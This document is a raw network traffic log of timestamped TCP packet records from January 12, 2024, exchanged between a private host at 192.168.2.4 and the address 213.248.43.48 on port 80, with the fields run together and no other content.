                                                          Jan 12, 2024 23:12:31.473916054 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.473959923 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.474009037 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.474239111 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.474296093 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.475245953 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.475306988 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.695434093 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.695512056 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.695547104 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.695599079 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.695599079 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.695599079 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.696813107 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.917176008 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.917216063 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.917351007 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.917536974 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.917625904 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:31.917711020 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:31.917998075 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.140671968 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.140917063 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.141668081 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.141746998 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.142430067 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.142518997 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.142540932 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.142599106 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.361718893 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.361813068 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.362019062 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.362083912 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.362245083 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.362299919 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.362833023 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.362895012 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.362998009 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.363059998 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.363432884 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.363502026 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.582673073 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.582771063 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.583003044 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.583039045 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.583070993 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.583098888 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.583426952 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.583487988 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.583497047 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.583553076 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.583692074 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.583749056 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.584450960 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.584517956 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.627974033 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.628084898 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.803946972 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.804043055 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.804208994 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.804241896 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.804287910 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.804321051 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.804351091 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.804369926 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.804383993 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.804429054 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.804974079 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.805047989 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:32.892154932 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:32.892252922 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.024595976 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.024684906 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.024900913 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.025052071 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.025053978 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.025125027 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.025448084 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.025521040 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.025573015 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.025645018 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.025645971 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.025707960 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.025949001 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.026015043 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.155859947 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.156120062 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.245862007 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.245987892 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.246212959 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.246299982 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.246335983 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.246367931 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.246378899 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.246436119 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.246546030 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.246614933 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.420938969 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.421037912 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.469796896 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.469913960 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.469949007 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.469954014 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.470017910 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.470148087 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.470212936 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.470386028 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.470446110 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.470460892 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.470516920 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.512695074 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.512831926 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.642218113 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.642478943 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.690486908 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.690663099 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.690726995 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.690845966 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.690886021 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.690929890 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.691196918 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.691263914 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.691333055 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.691395998 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.691608906 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.691672087 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.692181110 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.692255020 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.692606926 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.692667961 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.741575956 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.741786957 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.863523006 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.863717079 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.911860943 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.911919117 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.911957026 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.912028074 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.912097931 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.912159920 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.912492037 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.912563086 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.912812948 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.912892103 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.912966013 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.913031101 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.913212061 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.913314104 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.913588047 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.913652897 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.913667917 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.913731098 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.913742065 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.913810015 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:33.962857962 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:33.962965965 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.084676981 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.084892035 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.133125067 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.133239985 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.133275032 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.133291006 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.133344889 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.133501053 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.133575916 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.133651972 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.133691072 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.133737087 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.134077072 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.134145975 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.134907007 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.134998083 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.135255098 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.135289907 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.135318995 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.135350943 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.135566950 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.135631084 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.179652929 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.179788113 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.189632893 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.189716101 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.305838108 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.305953979 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.354754925 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.354830980 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.354866028 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.354924917 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.355012894 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.355089903 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.355257988 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.355325937 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.355488062 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.355555058 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.355557919 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.355621099 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.355904102 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.355972052 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.356091976 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.356163979 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.356618881 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.356692076 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.356936932 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.357006073 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.357155085 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.357186079 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.357218027 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.357249975 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.413403034 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.413523912 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.528099060 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.528202057 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.572103024 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.572189093 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.576791048 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.576870918 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.577187061 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.577256918 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.577363968 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.577430964 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.577478886 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.577538013 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.577729940 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.577795029 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.579003096 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.579057932 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.579090118 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.579091072 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.579124928 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.579166889 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.579210997 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.579241037 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.579329014 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.579344988 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.579360962 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.579389095 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.579422951 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.620405912 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.620475054 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.635232925 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.635322094 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.704180956 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.704402924 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.749512911 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.749614000 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.797830105 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.798177958 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.798568964 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.798613071 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.798747063 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.800196886 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.800304890 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.800633907 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.800698042 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.801073074 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.801137924 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.801148891 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.801208019 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.801309109 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.801341057 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.801378012 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.801415920 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.801431894 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.801450014 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.801480055 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.801484108 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.801513910 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.801562071 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.857183933 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.857291937 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.857367039 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.857408047 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.925009966 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.925124884 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:34.970519066 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:34.970614910 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.019680977 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.019716978 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.019750118 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.019778967 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.019783020 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.019855022 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.019860983 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.019921064 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.019979954 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.020042896 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.020908117 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.020981073 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.021042109 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.021104097 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.021614075 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.021671057 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.022041082 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.022108078 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.022260904 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.022334099 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.022783995 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.022847891 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.023119926 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023186922 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.023411036 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023442030 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023467064 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.023474932 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023497105 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.023507118 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.023561001 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.080730915 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.080849886 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.146034956 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.146123886 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.192830086 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.192938089 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.241749048 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.241785049 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.241863012 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.241918087 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.242383957 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.242469072 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.242635012 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.242698908 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.242707968 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.242765903 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.242861986 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.242919922 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.243093014 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.243158102 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.243280888 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.243345022 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.243392944 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.243474007 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.243655920 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.243720055 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.244041920 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.244103909 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.244570017 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.244626999 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.244659901 CET8049737213.248.43.48192.168.2.4
                                                          Jan 12, 2024 23:12:35.244725943 CET4973780192.168.2.4213.248.43.48
                                                          Jan 12, 2024 23:12:35.244996071 CET8049737213.248.43.48192.168.2.4
